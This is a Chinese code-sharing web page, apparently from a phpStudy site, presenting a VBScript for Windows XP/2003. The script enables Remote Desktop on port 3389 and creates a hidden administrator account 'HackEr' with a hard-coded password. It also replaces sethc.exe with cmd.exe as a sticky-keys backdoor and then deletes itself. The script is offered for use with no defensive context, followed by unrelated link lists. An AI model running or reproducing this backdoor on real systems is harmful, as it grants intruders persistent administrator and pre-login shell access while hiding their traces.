xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs


复制代码 代码如下:

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)



相关阅读:
javascript在事件监听方面的兼容性小结
php获取mysql版本的几种方法小结
PHP学习宝典-第六章
如何用javascript判断录入的日期是否合法
Linux防火墙该如何设置
针对class、id所做的CSS HACK
关于Aptana Studio生成自动备份文件的解决办法
ext 同步和异步示例代码
如何在linux下使用u盘
建站选择CMS一定要谨慎
浏览器发展/CSS布局/怎样运用?
创造收藏夹中的个性化图标
一个判断email合法性的函数[非正则]
使用PHP编写基于Web的文件管理系统
快速导航
PHP MySQL HTML CSS JavaScript MSSQL AJAX .NET JSP Linux Mac ASP 服务器 SQL jQuery C# C++ java Android IOS oracle MongoDB SQLite wamp 交通频道 作文范文 马年同事结婚祝福贺词大全 无微不至的爱作文500字 诗情画意的句子图片大全 开无犯罪证明 人一生最明白的七个时刻别将来后悔 人教版九年级语文上册第一单元测试卷 《笑猫日记》读后感300字 只好偷偷恋着你 两人三足接力赛作文300字 小学六年级作文300字:开发噪音 有理想 梦中独白 我与中国梦作文400字 四月,烟雨的眼泪 搞笑损人的话 幼儿园大班教学计划 心泉叮咚 充满灵性的紫砂壶作文600字 战斗大师与雷神11500字 小鹰学飞作文400字 走进自然之中作文700字 市直机关组查摆阶段督查情况汇报 幼儿安全教育计划表 民主生活会发言材料 同桌,你在天国还好吗?作文300字 小学教师安全工作总结(17) 2016公司年会邀请函 接受帮助也是一种美德 奇迹是勇气绽放的花_青春励志 第一次做蛋抄饭。。 总有我的季节作文700字 商场百货部年度工作汇报 怀乡忆旧 幼稚园家长会总结 赵康瑞 谢谢作文350字 名字 牵着孩子的手去书店 访问我的朋友 团委学生会宣传部工作总结 有人仗势把人欺,多行不义必自毙 护士辞职信怎么写 二月八日生日花语 班主任老师第一节课激励发言稿 穿越闷热的天空 谁能帮帮我呀?????? 醉落魄(述怀) 缤纷暑假,由我做主 自己的老婆还得自己来疼 人教版八年级物理暑假作业参考答案 墨西哥“血”特别浓

Copyright © 2016 phpStudy |